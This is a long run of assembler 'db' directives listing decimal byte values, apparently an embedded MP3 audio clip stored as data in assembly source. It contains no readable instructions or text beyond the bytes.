149,216,177,200,174,228,64,167,74,226,60,214,72,193,32,28 + db 96,160,64,183,197,69,20,163,183,146,170,213,253,104,246,191 + db 86,239,157,162,86,113,222,203,93,190,123,150,254,183,167,90 + db 255,214,188,25,20,233,244,99,251,144,135,42,183,72,176,199 + db 0,1,121,168,0,65,255,227,32,196,165,19,67,6,80,52 + db 24,79,172,224,136,230,230,77,54,5,184,165,154,152,231,29 + db 51,210,27,153,51,68,59,146,89,223,89,132,183,116,85,153 + db 123,247,182,218,63,186,209,52,116,186,111,181,208,165,255,47 + db 254,213,86,219,180,197,183,101,69,179,45,186,154,222,150,110 + db 251,116,209,215,246,87,4,98,119,228,157,125,167,135,113,182 + db 165,206,100,162,63,153,165,26,116,52,212,9,116,4,255,227 + db 32,196,179,20,131,6,99,248,48,84,220,48,194,48,186,170 + db 73,51,186,246,231,219,129,161,180,132,71,117,234,115,208,170 + db 224,173,224,3,236,153,128,17,48,20,242,240,127,64,224,25 + db 35,67,64,27,66,116,12,68,27,58,95,46,136,74,6,96 + db 230,141,141,52,65,186,96,115,96,72,202,197,114,124,4,80 + db 102,154,129,163,160,84,13,76,2,188,9,161,54,51,100,216 + db 201,138,128,18,19,49,255,227,32,196,188,22,3,10,91,249 + db 72,80,0,64,238,252,27,128,46,0,71,131,88,104,19,235 + db 15,241,19,52,72,225,19,255,201,132,70,65,101,195,136,186 + db 174,143,127,255,204,73,242,162,150,98,79,169,18,6,125,15 + db 250,255,255,235,47,139,5,52,75,238,165,186,180,230,38,255 + db 255,229,225,245,35,184,131,0,0,1,8,64,0,64,13,108 + db 161,182,99,75,12,193,143,13,42,129,109,63,243,69,255,227 + db 32,196,191,41,130,250,206,85,153,145,32,210,43,223,22,86 + db 105,89,101,140,2,115,56,6,58,3,28,58,29,72,146,9 + db 9,113,99,232,166,125,138,131,198,136,93,146,121,136,150,179 + db 92,77,29,35,128,124,73,22,101,9,177,189,116,137,34,19 + db 197,145,73,72,72,78,63,14,171,82,101,199,56,71,74,136 + db 245,53,223,183,65,15,243,55,215,253,93,127,255,255,253,111 + db 255,250,45,91,182,221,255,227,32,196,116,32,3,6,214,183 + db 152,104,0,123,108,104,196,247,189,127,212,109,123,189,95,174 + db 16,20,87,186,73,38,243,116,83,148,67,184,4,228,136,253 + db 75,150,73,240,190,99,180,213,39,244,81,144,26,83,91,252 + db 160,58,238,128,116,247,150,61,234,6,189,3,1,174,144,23 + db 168,207,169,255,32,190,192,76,4,171,8,5,144,119,171,245 + db 27,78,44,2,124,118,102,253,133,85,79,96,0,4,255,227 + db 32,196,79,19,0,198,217,231,210,80,0,0,65,209,250,44 + db 141,19,8,176,162,19,118,172,227,234,37,245,103,167,192,129 + db 71,215,249,130,223,196,96,150,185,98,94,160,223,168,151,194 + db 190,177,47,168,58,167,173,193,37,3,40,196,165,132,190,44 + db 13,114,75,42,119,42,87,240,215,13,22,55,99,80,168,52 + db 251,159,105,25,38,8,67,127,160,32,44,182,99,147,74,4 + db 101,107,10,22,32,233,255,227,32,196,94,20,0,154,227,248 + db 27,196,82,1,80,209,8,226,173,242,170,224,181,99,191,255 + db 215,142,162,105,162,212,101,157,227,9,30,71,36,255,123,191 + db 245,179,212,30,90,8,168,74,24,88,136,88,121,34,192,38 + db 190,68,169,34,79,215,232,87,243,88,243,128,55,74,172,201 + db 227,79,167,125,95,0,0,13,187,238,243,148,203,113,171,25 + db 130,158,105,196,245,79,131,107,138,177,19,41,100,158,255,227 + db 32,196,105,20,0,202,207,242,46,80,70,124,38,111,220,181 + db 170,23,246,61,61,84,11,188,12,74,13,82,44,21,240,40 + db 10,172,168,101,202,60,166,29,127,149,43,212,37,17,120,85 + db 221,96,33,23,165,191,10,187,149,2,187,23,27,196,190,206 + db 89,127,252,168,207,56,102,119,134,77,53,170,99,107,145,0 + db 8,8,4,227,111,4,92,119,218,219,114,71,2,244,56,52 + db 232,248,34,177,85,1,255,227,32,196,116,20,192,110,147,249 + db 88,0,0,194,79,200,206,111,15,100,0,250,176,203,193,101 + db 5,226,105,96,136,64,219,65,188,226,17,134,51,11,131,115 + db 18,24,56,4,120,121,102,228,72,156,39,12,207,147,199,137 + db 245,155,23,10,133,116,144,32,98,231,34,99,54,100,68,25 + db 141,153,37,172,205,51,244,13,232,19,4,227,14,101,238,204 + db 197,247,186,75,100,16,43,160,196,17,19,114,230,150,255,227 + db 32,196,124,41,67,66,230,255,153,155,36,205,211,116,251,160 + db 200,17,115,119,79,65,191,255,255,254,164,13,12,205,208,233 + db 203,159,255,247,255,243,70,160,104,65,205,192,225,243,229,253 + db 42,95,251,213,106,128,17,0,9,64,130,34,138,64,16,34 + db 92,38,138,242,72,92,72,211,95,202,182,27,202,170,250,87 + db 42,165,4,198,135,158,106,179,133,87,44,145,70,50,39,4 + db 248,110,227,148,39,212,255,227,32,196,50,29,129,194,222,223 + db 152,136,0,145,80,47,205,166,69,49,147,83,40,153,34,77 + db 89,144,233,55,162,70,159,73,180,77,19,234,72,219,155,245 + db 158,152,54,179,10,75,106,203,207,90,87,217,168,32,96,111 + db 205,79,136,136,93,244,122,86,233,62,39,127,216,167,249,248 + db 159,119,161,22,127,253,95,183,0,11,43,126,236,146,76,202 + db 64,205,62,164,73,48,144,5,88,188,138,54,125,53,255,227 + db 32,196,23,19,129,134,229,247,205,80,0,19,198,161,36,80 + db 62,255,152,99,34,161,223,254,168,199,127,109,204,83,9,182 + db 254,203,65,241,55,245,18,236,121,64,48,151,226,80,85,31 + db 71,234,18,157,87,193,163,191,112,136,26,119,203,3,95,150 + db 14,255,147,0,4,136,187,184,150,26,110,65,175,69,32,184 + db 4,12,52,89,113,156,86,52,56,17,148,168,178,196,105,29 + db 74,38,111,253,148,228,255,227,32,196,36,19,64,170,213,254 + db 27,196,84,20,255,232,164,128,56,5,58,167,184,112,240,19 + db 229,147,203,60,178,197,111,102,150,127,237,64,181,18,32,65 + db 96,218,76,181,232,191,77,31,202,255,82,191,192,3,66,37 + db 235,172,214,22,235,170,31,193,196,1,176,181,65,198,254,55 + db 90,233,184,210,85,39,69,137,234,6,190,85,223,18,252,177 + db 238,136,45,245,157,158,88,104,168,105,164,131,161,216,255,227 + db 32,196,50,19,128,118,195,243,79,16,2,42,119,203,7,119 + db 34,88,121,24,152,26,14,149,1,56,241,34,170,71,220,87 + db 193,167,14,127,255,203,127,74,204,230,147,199,227,176,36,32 + db 8,16,0,26,198,164,172,41,174,154,6,134,49,171,141,246 + db 109,229,53,32,23,132,76,232,39,211,14,72,75,129,68,18 + db 183,163,185,187,38,73,4,128,146,142,68,89,26,78,254,92 + db 39,159,47,164,74,107,255,227,32,196,63,32,67,178,202,93 + db 143,106,32,239,249,16,186,83,51,50,37,13,63,239,249,125 + db 3,98,227,20,9,50,153,223,213,221,255,229,163,144,188,138 + db 141,204,221,204,13,11,159,255,255,219,173,211,77,3,235,164 + db 201,166,171,119,255,255,245,59,223,245,166,186,209,81,163,27 + db 151,14,26,185,191,139,250,190,252,129,72,203,140,205,10,82 + db 99,148,77,42,77,255,172,106,191,169,117,74,24,83,255,227 + db 32,196,25,18,128,182,149,149,195,24,0,192,168,192,104,76 + db 120,52,84,96,42,190,129,17,224,215,137,181,7,79,60,168 + db 8,25,34,214,101,159,6,92,85,67,195,164,173,253,156,74 + db 18,6,131,191,255,255,252,68,121,66,32,231,55,249,77,206 + db 252,174,195,10,124,174,219,131,228,93,157,24,239,84,166,109 + db 45,212,199,57,158,93,144,79,246,199,251,50,33,93,25,202 + db 142,101,11,18,93,106,255,227,32,196,42,19,131,158,109,190 + db 16,75,168,156,189,127,39,243,153,160,159,93,203,127,95,171 + db 249,199,93,235,233,63,237,175,103,178,141,76,223,255,237,255 + db 255,224,44,70,106,46,79,3,72,105,217,91,118,202,220,55 + db 172,109,134,208,54,128,80,38,16,33,165,75,228,38,251,175 + db 38,31,235,183,99,208,140,231,57,61,104,63,89,44,117,157 + db 58,113,212,247,91,206,239,39,165,46,223,255,239,255,255,227 + db 32,196,55,20,131,162,122,255,73,16,0,201,177,58,54,207 + db 254,205,254,223,246,93,239,251,186,123,39,161,55,255,255,255 + db 255,21,77,27,8,127,36,84,35,31,14,133,111,90,210,68 + db 48,28,34,39,189,164,68,24,156,114,104,20,80,163,203,234 + db 98,14,166,89,131,34,103,69,150,80,205,90,53,192,4,206 + db 36,8,28,83,97,191,139,140,1,149,136,176,18,0,77,16 + db 17,2,144,49,101,140,255,227,32,196,64,31,193,114,166,95 + db 154,161,0,152,97,68,152,205,22,153,149,204,205,217,175,153 + db 210,65,19,243,117,26,21,212,130,75,43,160,213,24,148,22 + db 197,247,82,9,173,217,14,218,117,205,238,213,68,189,79,86 + db 202,52,255,253,251,177,133,63,161,246,255,59,252,187,214,207 + db 69,72,254,32,64,8,2,5,70,173,91,96,0,52,67,9 + db 20,105,221,134,166,191,22,113,117,59,182,207,145,134,255,227 + db 32,196,28,26,193,118,218,95,152,120,0,242,150,228,36,123 + db 85,124,227,83,188,14,106,96,76,159,215,190,213,111,42,110 + db 16,143,71,209,157,234,145,59,251,209,236,120,91,196,40,215 + db 196,79,255,180,61,124,86,205,119,197,119,253,32,106,245,143 + db 159,15,25,248,215,172,29,20,234,23,127,44,120,255,255,255 + db 26,93,190,216,183,215,255,255,91,211,148,0,0,104,1,243 + db 140,94,153,172,8,251,255,227,32,196,12,19,65,214,211,249 + db 207,16,2,218,26,57,133,137,155,118,131,125,91,112,163,34 + db 73,202,132,223,242,149,191,244,55,255,67,63,253,74,86,255 + db 208,165,253,22,89,191,234,80,165,250,63,79,172,26,127,137 + db 64,79,234,61,241,23,188,168,73,43,51,88,72,247,138,32 + db 241,19,181,149,32,1,236,45,51,114,11,5,213,221,82,1 + db 25,160,193,113,208,177,193,8,12,128,247,155,88,132,255,227 + db 32,196,26,20,0,70,181,118,8,82,0,9,229,39,206,121 + db 114,23,101,220,248,124,185,162,7,200,4,65,240,193,242,46 + db 214,150,44,208,93,242,152,156,34,42,170,106,21,53,52,190 + db 3,22,197,164,30,173,102,128,135,197,77,122,127,242,130,212 + db 211,34,99,32,66,88,185,142,214,197,76,187,68,92,26,227 + db 241,63,218,181,51,181,126,245,236,239,170,137,172,165,203,79 + db 186,234,167,177,241,164,255,227,32,196,37,24,193,54,188,94 + db 14,30,112,251,116,67,188,111,2,176,7,113,120,193,52,39 + db 144,228,136,254,237,167,160,157,150,160,192,6,224,244,18,197 + db 93,169,171,225,178,27,4,40,152,164,67,29,36,62,175,248 + db 156,222,168,211,97,2,14,241,157,171,15,127,255,81,203,168 + db 141,165,0,30,36,199,36,97,185,82,143,26,17,216,5,23 + db 61,227,219,89,255,225,133,148,87,66,56,176,231,106,255,227 + db 32,196,29,19,0,250,217,86,27,208,114,251,76,242,105,193 + db 48,0,64,57,21,127,31,247,82,30,184,103,224,209,127,168 + db 239,214,84,107,188,70,68,184,91,201,180,19,11,250,247,234 + db 88,84,162,61,31,206,176,112,99,150,233,0,0,46,129,250 + db 9,136,137,110,171,148,68,9,26,191,242,212,40,192,66,191 + db 245,41,130,137,111,193,81,238,223,44,37,117,105,168,68,121 + db 242,101,3,20,190,15,255,227,32,196,44,19,128,198,227,248 + db 26,68,102,135,251,253,96,0,1,7,43,168,62,243,244,166 + db 46,88,152,98,31,98,209,127,214,218,69,53,65,243,253,78 + db 128,28,137,64,255,10,61,221,203,113,65,52,56,57,25,101 + db 232,128,102,32,24,11,208,120,4,7,70,213,176,232,150,184 + db 27,147,196,48,173,255,186,251,229,32,224,97,31,20,253,205 + db 249,72,157,190,187,145,178,128,65,212,87,30,15,161,255,227 + db 32,196,57,19,192,146,192,16,70,24,100,105,85,35,133,26 + db 121,52,144,40,17,34,73,0,216,54,2,107,94,175,255,253 + db 127,208,0,153,141,41,216,49,158,90,198,105,252,47,184,12 + db 101,189,115,40,42,253,53,173,231,173,231,1,184,238,227,18 + db 151,116,201,253,78,197,111,254,83,127,164,57,193,225,126,17 + db 62,115,243,142,232,19,246,122,229,78,251,36,153,168,89,195 + db 31,128,139,53,167,127,255,227,32,196,69,19,129,34,217,94 + db 14,4,84,254,191,242,90,19,80,241,166,127,64,0,42,183 + db 19,22,213,104,251,129,108,232,121,170,136,240,170,157,83,1 + db 1,9,241,48,44,2,241,80,104,75,214,42,42,239,196,174 + db 245,128,156,197,7,130,224,48,144,122,131,70,128,172,37,209 + db 114,234,22,138,202,176,22,196,110,168,88,89,169,59,219,210 + db 35,115,21,115,215,90,57,19,46,26,43,163,224,3,255,227 + db 32,196,82,20,0,118,227,242,70,4,98,68,206,146,79,101 + db 174,133,33,61,12,160,224,4,176,248,147,214,250,153,50,248 + db 32,8,18,32,12,104,4,1,0,199,137,1,15,140,151,15 + db 193,3,0,128,96,78,127,136,29,255,171,215,213,79,89,112 + db 129,192,194,20,48,128,2,22,139,58,40,194,151,153,76,207 + db 168,99,10,35,247,33,4,182,171,186,198,85,0,0,8,130 + db 68,0,17,65,62,10,255,227,32,196,93,20,0,126,207,243 + db 77,72,2,210,126,138,82,151,226,15,114,226,210,74,20,1 + db 38,13,82,200,45,102,6,188,108,80,255,220,49,167,171,22 + db 134,235,223,0,232,204,52,68,28,232,152,2,128,142,165,31 + db 148,107,53,134,187,60,191,83,167,143,172,239,10,77,172,254 + db 193,95,159,210,216,248,254,14,255,214,219,255,213,40,242,55 + db 239,234,115,163,228,255,211,247,249,64,136,57,250,191,255,227 + db 32,196,104,28,1,118,226,215,143,120,0,139,55,233,109,255 + db 218,54,143,232,0,167,40,82,218,232,153,187,172,204,43,194 + db 172,75,27,43,214,161,192,57,6,85,127,19,15,128,224,112 + db 50,175,236,38,96,232,175,191,34,137,11,2,207,222,34,18 + db 249,82,207,234,111,56,172,134,167,93,237,199,36,99,20,63 + db 10,183,169,36,148,239,252,62,113,104,12,188,111,168,6,148 + db 145,44,200,192,157,40,255,227,32,196,83,18,128,250,229,79 + db 205,40,2,215,82,35,65,61,27,31,31,192,122,105,141,129 + db 149,31,127,239,166,9,69,70,172,74,186,132,207,208,68,21 + db 17,70,36,36,29,105,197,12,28,130,117,32,64,16,210,46 + db 84,92,227,129,100,155,20,136,142,212,216,45,233,255,255,255 + db 236,77,140,179,255,177,41,232,0,34,166,2,221,235,77,210 + db 20,20,66,102,48,43,163,197,214,243,140,221,58,18,255,227 + db 32,196,100,19,64,146,221,86,11,210,50,88,136,247,234,42 + db 1,99,34,232,245,31,253,80,71,254,32,223,231,63,245,19 + db 2,19,188,166,50,255,115,9,57,244,193,81,132,63,255,255 + db 244,207,117,181,61,228,180,84,230,67,205,12,108,191,13,45 + db 59,211,232,0,0,20,5,241,141,234,3,200,14,2,192,95 + db 197,129,147,90,249,244,127,28,190,70,214,254,57,140,55,9 + db 128,170,125,35,230,127,255,227,32,196,114,19,129,162,225,150 + db 122,138,198,69,27,127,206,111,245,47,254,202,135,127,83,90 + db 221,28,210,87,245,99,143,111,245,255,255,246,255,223,250,162 + db 235,182,121,107,113,103,245,125,189,198,179,70,3,123,233,72 + db 128,87,19,113,51,146,201,235,105,0,36,89,9,66,129,64 + db 176,84,44,88,136,116,195,86,132,234,33,17,89,216,84,226 + db 161,34,128,164,137,25,72,52,166,56,137,78,66,138,255,227 + db 32,196,127,20,2,194,223,249,79,56,2,21,84,89,17,28 + db 72,140,179,196,228,23,101,142,101,43,126,164,191,119,117,73 + db 203,255,163,74,214,251,53,191,255,255,255,255,255,253,122,33 + db 221,172,215,122,163,182,202,189,127,255,254,170,206,239,32,120 + db 64,130,234,132,251,51,20,170,115,136,1,156,88,112,69,255 + db 166,86,102,219,107,174,142,180,5,32,242,14,93,134,38,161 + db 153,231,231,3,30,10,255,227,32,196,138,29,4,2,218,249 + db 137,40,36,68,77,80,16,45,147,10,137,1,201,145,137,88 + db 74,68,93,115,0,173,163,144,72,180,148,105,193,122,78,128 + db 150,116,169,192,48,211,162,230,194,79,185,70,81,66,229,41 + db 65,11,38,176,163,177,238,117,182,127,191,181,41,116,92,179 + db 205,17,165,198,127,133,86,117,251,237,172,110,164,0,8,193 + db 224,209,98,172,17,60,4,17,8,164,153,48,59,201,255,227 + db 32,196,113,22,0,98,194,255,195,0,0,68,161,68,184,237 + db 132,194,226,103,96,22,134,197,111,89,16,43,42,26,181,131 + db 96,8,84,64,183,52,170,154,192,229,13,27,36,78,228,75 + db 123,226,203,32,92,0,44,10,40,121,82,53,31,21,181,235 + db 37,254,219,43,102,170,115,234,20,174,75,46,214,234,210,248 + db 8,34,35,29,6,99,168,200,177,147,62,99,75,42,236,214 + db 235,120,68,108,86,88,255,227,32,196,116,21,192,2,182,254 + db 0,0,0,159,47,200,174,116,62,13,188,80,112,68,160,16 + db 232,80,185,116,44,139,200,146,58,199,106,142,208,66,112,211 + db 90,68,84,89,10,166,210,179,176,85,237,76,234,37,132,167 + db 142,129,77,7,92,29,91,190,171,21,158,117,215,29,65,18 + db 201,82,107,239,194,168,106,172,53,85,224,170,165,133,82,147 + db 70,97,75,12,124,34,182,66,197,181,121,50,147,109,255,227 + db 32,196,120,22,193,22,170,92,8,70,28,17,24,102,21,13 + db 104,133,32,135,44,202,21,203,127,223,69,46,189,26,229,82 + db 253,159,42,25,81,203,110,234,198,71,47,245,47,51,247,237 + db 87,153,218,250,234,200,255,29,63,253,52,30,224,33,17,47 + db 110,75,171,118,79,183,252,78,246,125,143,128,209,76,170,142 + db 215,117,179,229,229,153,156,61,122,122,250,245,179,94,252,211 + db 204,215,71,66,77,103,255,227,32,196,120,20,131,10,125,148 + db 24,68,188,46,189,41,25,73,114,38,134,75,15,159,253,255 + db 129,134,192,83,36,73,159,23,82,222,85,203,38,46,101,135 + db 26,52,128,174,227,159,253,63,255,224,125,5,228,25,71,86 + db 56,235,53,187,84,210,104,235,77,40,1,64,47,212,0,216 + db 67,4,140,80,74,187,244,201,222,243,12,12,51,76,199,111 + db 8,198,38,164,144,6,80,105,145,43,78,164,174,211,255,227 + db 32,196,129,20,129,198,122,95,66,24,0,91,18,96,57,246 + db 159,185,4,252,55,252,159,101,247,237,172,74,120,252,162,114 + db 49,79,110,71,132,242,52,79,92,206,164,222,232,109,99,141 + db 137,153,187,119,237,91,134,232,235,203,242,238,21,51,255,202 + db 222,185,171,24,107,55,254,221,137,92,190,89,235,20,44,27 + db 141,182,94,183,236,93,103,207,221,255,251,255,79,220,109,159 + db 255,255,65,1,225,159,255,227,32,196,138,34,129,122,186,95 + db 155,194,38,86,177,0,8,33,197,235,32,0,140,214,226,43 + db 150,34,247,69,222,66,206,0,71,239,11,118,78,19,56,216 + db 138,183,82,160,54,240,131,18,128,57,28,162,0,182,128,199 + db 0,128,11,65,138,140,0,225,89,208,56,33,97,106,83,62 + db 102,50,201,68,220,196,249,3,173,214,152,243,74,74,73,131 + db 209,6,29,25,18,112,227,73,201,3,68,80,64,148,255,227 + db 32,196,91,36,67,54,218,55,152,105,2,153,30,169,101,220 + db 127,60,163,163,242,233,208,251,172,216,211,177,186,167,75,165 + db 143,87,255,255,251,127,255,237,160,204,180,63,87,208,189,52 + db 53,55,245,34,139,25,6,24,76,68,71,179,254,229,82,113 + db 63,218,247,90,71,201,241,172,27,32,54,104,59,7,206,77 + db 216,249,169,62,60,149,196,218,2,248,21,2,34,81,91,238 + db 180,231,12,139,229,195,255,227,32,196,37,18,193,194,208,1 + db 209,144,0,70,127,245,50,111,255,82,84,255,235,100,104,127 + db 233,104,127,162,163,85,49,152,24,98,96,201,194,31,255,245 + db 57,106,154,72,240,137,193,175,167,48,8,86,188,24,18,198 + db 96,38,236,189,141,17,70,132,207,155,142,60,86,213,35,34 + db 40,195,65,224,209,200,183,243,213,202,74,185,96,101,26,73 + db 18,219,24,61,196,148,190,251,26,125,106,178,164,160,255,227 + db 32,196,53,19,64,170,215,234,30,18,72,168,156,53,152,185 + db 65,175,255,105,186,177,66,193,212,214,72,32,40,159,171,245 + db 183,243,63,192,0,177,221,193,208,6,111,85,179,233,238,200 + db 12,145,236,174,85,68,222,45,107,70,157,133,154,198,0,154 + db 161,209,200,190,252,133,1,221,191,253,95,255,216,205,255,109 + db 135,7,217,94,64,135,228,159,251,127,2,170,238,56,213,74 + db 61,150,111,230,191,22,255,227,32,196,67,18,129,110,217,86 + db 27,202,84,53,108,177,34,198,70,255,208,1,153,203,110,18 + db 42,57,221,195,201,133,220,11,40,25,153,143,87,159,236,38 + db 224,41,97,83,206,245,133,67,127,136,131,190,21,2,130,174 + db 37,40,44,241,40,119,194,74,120,52,157,178,193,214,189,228 + db 92,161,87,105,208,1,0,168,171,43,176,210,155,237,255,71 + db 253,241,48,52,247,134,154,91,167,128,3,84,207,255,255,227 + db 32,196,84,19,192,130,213,86,30,18,98,142,89,217,221,107 + db 113,234,21,132,0,220,244,212,145,135,102,169,251,87,157,254 + db 86,149,191,160,70,188,4,29,249,111,150,248,120,26,157,210 + db 179,165,70,98,203,5,65,164,45,108,44,13,1,144,180,203 + db 30,209,137,65,86,179,88,107,233,214,245,211,103,255,175,254 + db 245,255,42,148,0,0,1,236,137,178,208,227,171,172,172,74 + db 119,157,248,172,174,218,255,227,32,196,96,19,0,114,203,243 + db 88,16,2,212,24,222,251,96,13,138,78,128,9,214,119,218 + db 121,21,233,245,31,130,126,87,252,191,190,213,147,227,72,92 + db 121,49,14,133,105,150,187,102,66,21,174,114,166,22,43,167 + db 23,83,76,172,154,227,241,174,59,168,74,132,101,113,11,231 + db 123,245,105,121,231,134,171,127,39,137,36,89,245,188,106,215 + db 197,191,146,35,205,23,53,111,140,32,5,30,111,77,255,227 + db 32,196,111,33,65,170,222,61,153,122,34,111,252,4,116,122 + db 231,110,49,15,244,151,127,118,138,159,127,201,168,164,223,201 + db 255,234,0,132,229,198,43,92,253,70,221,163,35,129,241,26 + db 53,191,255,250,222,0,231,134,231,213,238,129,228,131,81,228 + db 127,105,160,208,93,61,127,208,76,151,40,183,251,162,78,125 + db 191,204,27,225,179,127,255,255,239,244,139,192,86,172,70,235 + db 116,183,189,105,146,53,255,227,32,196,69,20,1,110,225,79 + db 207,104,2,129,143,168,90,197,153,128,77,60,168,51,189,3 + db 182,238,178,128,8,143,228,203,21,1,42,1,226,202,175,208 + db 48,6,225,161,38,187,117,181,1,80,42,143,17,31,119,134 + db 190,85,223,60,223,18,153,251,152,63,180,161,62,85,197,62 + db 44,238,26,30,32,235,119,253,16,13,103,208,64,97,16,145 + db 49,28,15,18,8,129,120,156,248,87,88,0,0,109,255,227 + db 32,196,80,19,0,158,225,78,11,82,58,134,245,138,109,228 + db 5,133,89,70,148,91,68,137,49,9,123,172,255,157,90,88 + db 171,162,12,113,0,192,111,243,56,139,189,159,172,53,241,40 + db 44,121,226,32,105,193,171,2,183,2,161,175,44,29,6,158 + db 220,26,104,51,203,127,136,185,81,10,195,93,127,225,160,11 + db 188,239,5,98,81,186,176,208,115,90,12,6,15,4,198,149 + db 248,182,0,8,34,207,255,227,32,196,95,20,128,162,219,249 + db 79,40,2,180,190,3,161,142,191,217,67,198,171,82,208,195 + db 78,81,209,5,232,66,124,30,77,53,49,16,32,220,61,164 + db 145,244,89,212,154,103,185,116,147,72,213,204,25,149,48,52 + db 231,140,22,138,170,90,6,40,41,126,235,169,75,166,141,212 + db 214,234,111,255,255,255,239,186,110,164,25,58,21,244,53,234 + db 245,251,36,200,52,209,208,86,92,46,26,36,147,25,255,227 + db 32,196,104,34,195,234,206,91,152,105,0,104,170,190,138,210 + db 169,53,51,234,246,173,205,221,3,198,232,38,211,51,121,167 + db 209,82,204,147,49,66,206,203,83,175,253,122,204,16,141,0 + db 1,167,36,155,126,106,242,218,250,197,255,170,100,32,106,69 + db 116,104,59,175,199,198,164,78,7,177,200,223,208,169,141,221 + db 226,0,112,255,88,62,4,127,40,25,46,238,15,215,161,65 + db 6,14,121,57,48,124,255,227,32,196,56,20,64,170,230,61 + db 207,104,2,112,9,239,130,7,45,255,244,149,5,84,40,99 + db 255,246,184,4,253,183,145,98,117,176,176,83,212,0,0,61 + db 0,182,38,238,232,0,25,70,6,6,74,222,241,74,95,221 + db 129,173,168,239,48,16,160,11,58,3,191,255,241,48,72,247 + db 80,125,79,217,136,159,192,168,35,86,5,96,218,224,80,160 + db 52,242,195,69,132,129,80,8,215,26,172,240,149,62,255,227 + db 32,196,66,18,64,110,231,248,50,94,66,119,255,255,22,116 + db 241,95,22,17,189,158,58,132,139,83,116,199,21,77,117,110 + db 44,51,51,109,8,36,17,29,113,137,157,223,167,54,23,233 + db 193,240,125,224,249,112,176,32,15,188,224,33,243,129,250,130 + db 0,48,35,167,1,240,32,15,148,47,12,90,80,152,168,233 + db 255,228,17,225,143,91,252,166,237,18,250,207,187,215,244,156 + db 211,161,105,14,80,171,255,227,32,196,84,19,192,142,231,236 + db 27,216,70,85,84,76,38,6,145,200,250,181,173,86,179,80 + db 42,12,76,159,57,61,90,13,60,38,18,10,134,165,173,44 + db 121,96,179,207,2,167,104,161,156,53,194,68,206,137,72,130 + db 162,80,19,255,255,254,160,239,172,54,167,150,64,43,91,162 + db 93,154,119,158,137,104,88,8,26,18,185,99,12,255,224,10 + db 128,143,223,98,202,45,100,1,5,133,144,60,228,83,255,227 + db 32,196,96,20,0,110,220,182,27,24,66,131,28,224,4,236 + db 62,239,122,64,245,195,231,236,228,201,236,127,238,216,16,0 + db 16,182,207,99,152,1,200,222,138,2,10,104,221,132,192,51 + db 191,159,255,255,255,113,122,208,64,62,24,80,0,78,56,6 + db 31,229,255,242,156,64,190,95,250,87,167,143,128,16,25,38 + db 229,134,69,240,186,11,131,72,8,230,253,4,130,78,213,100 + db 213,66,65,114,109,238,255,227,32,196,107,20,1,86,231,242 + db 48,139,98,164,66,241,8,74,110,187,23,5,242,22,250,176 + db 193,27,244,87,116,250,49,1,19,245,135,151,164,19,242,158 + db 9,156,232,63,203,1,56,8,79,149,42,67,16,184,91,197 + db 125,94,92,139,245,28,127,127,153,236,4,83,158,187,175,151 + db 104,208,201,25,102,165,95,83,26,21,196,99,250,88,168,174 + db 7,138,61,83,65,128,142,53,111,68,32,19,73,141,255,227 + db 32,196,118,20,65,82,226,14,11,84,48,102,234,161,71,55 + db 238,113,91,253,206,127,248,172,191,57,198,95,223,193,2,66 + db 242,128,131,89,204,229,196,226,191,202,51,255,232,166,141,122 + db 104,242,143,154,140,133,128,12,222,223,112,124,152,102,209,197 + db 6,191,44,94,247,190,19,135,112,72,101,166,255,213,217,139 + db 106,42,124,111,255,250,153,69,27,184,37,214,26,242,190,63 + db 168,57,218,84,239,17,255,227,32,196,128,19,193,158,225,70 + db 122,138,126,121,225,46,183,114,164,171,229,177,17,234,97,210 + db 184,192,241,58,34,86,122,52,172,53,77,10,177,106,35,75 + db 18,43,53,6,50,184,238,172,50,254,200,122,190,147,56,192 + db 242,247,155,6,172,136,109,71,29,46,106,88,153,108,52,211 + db 43,144,189,75,126,206,232,33,226,240,236,18,158,42,239,174 + db 250,216,35,9,107,1,123,95,236,105,224,208,85,200,255,227 + db 32,196,140,20,64,166,217,238,30,30,36,173,63,229,147,197 + db 221,203,18,226,82,60,243,173,250,137,5,89,190,221,222,223 + db 255,179,101,31,54,117,120,99,124,255,83,57,222,160,0,36 + db 15,167,166,91,67,244,111,57,104,199,0,25,14,93,192,50 + db 0,240,17,181,36,147,50,96,75,4,156,101,133,209,36,154 + db 232,42,74,133,236,81,5,172,134,149,42,41,248,20,114,88 + db 208,21,129,40,37,52,255,227,32,196,150,21,0,162,144,29 + db 88,96,0,180,151,236,78,17,129,224,131,32,57,255,255,214 + db 157,52,205,199,39,250,95,235,49,37,205,93,7,101,177,153 + db 187,37,255,255,253,57,129,164,184,131,58,22,77,211,247,255 + db 255,255,169,5,51,244,25,102,142,254,145,83,31,33,77,23 + db 185,118,83,49,144,8,242,1,83,64,19,224,168,72,26,6 + db 129,167,229,65,80,150,84,21,130,166,19,44,44,46,255,227 + db 32,196,157,31,3,86,202,251,140,105,0,239,128,67,69,129 + db 166,145,207,8,143,9,70,29,215,168,68,29,80,53,17,3 + db 35,67,95,0,157,5,65,81,40,42,29,60,20,98,104,80 + db 136,22,44,123,255,255,255,82,200,22,6,141,204,127,28,22 + db 46,190,77,136,204,118,81,64,156,197,254,75,97,156,83,208 + db 174,94,191,50,127,5,72,204,202,245,176,223,200,115,86,59 + db 43,156,54,83,111,57,255,227,32,196,124,21,0,6,142,63 + db 193,0,0,168,123,155,64,170,147,254,89,212,151,131,175,231 + db 251,151,246,164,188,207,45,237,125,159,253,74,119,255,254,143 + db 255,254,246,56,6,220,186,79,225,83,150,81,167,37,154,91 + db 179,210,0,126,8,170,196,82,133,241,41,195,82,225,243,177 + db 189,82,245,37,47,167,130,232,122,25,165,55,203,204,236,118 + db 64,76,187,171,2,35,235,187,150,159,211,204,244,234,255,227 + db 32,196,131,20,3,162,89,150,24,85,117,229,169,181,46,81 + db 109,57,12,105,59,247,213,249,91,255,173,63,171,118,209,115 + db 191,39,255,255,255,228,43,24,48,210,244,200,127,5,240,124 + db 41,184,236,99,106,25,163,235,198,54,141,223,71,211,163,112 + db 204,96,253,27,79,254,143,130,247,209,180,125,122,54,143,130 + db 234,250,117,125,127,199,212,109,91,190,175,171,246,211,175,86 + db 209,245,234,54,141,130,255,227,32,196,142,21,67,166,106,94 + db 25,69,36,124,31,141,161,124,175,40,91,41,202,123,101,69 + db 9,4,79,135,128,150,46,14,234,95,23,14,127,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,255 + db 255,255,255,255,255,255,255,255,255,255,255,255,255,255,255,227 + db 32,196,148,20,195,214,64,200,40,149,120,255,255,255,255,255 + db 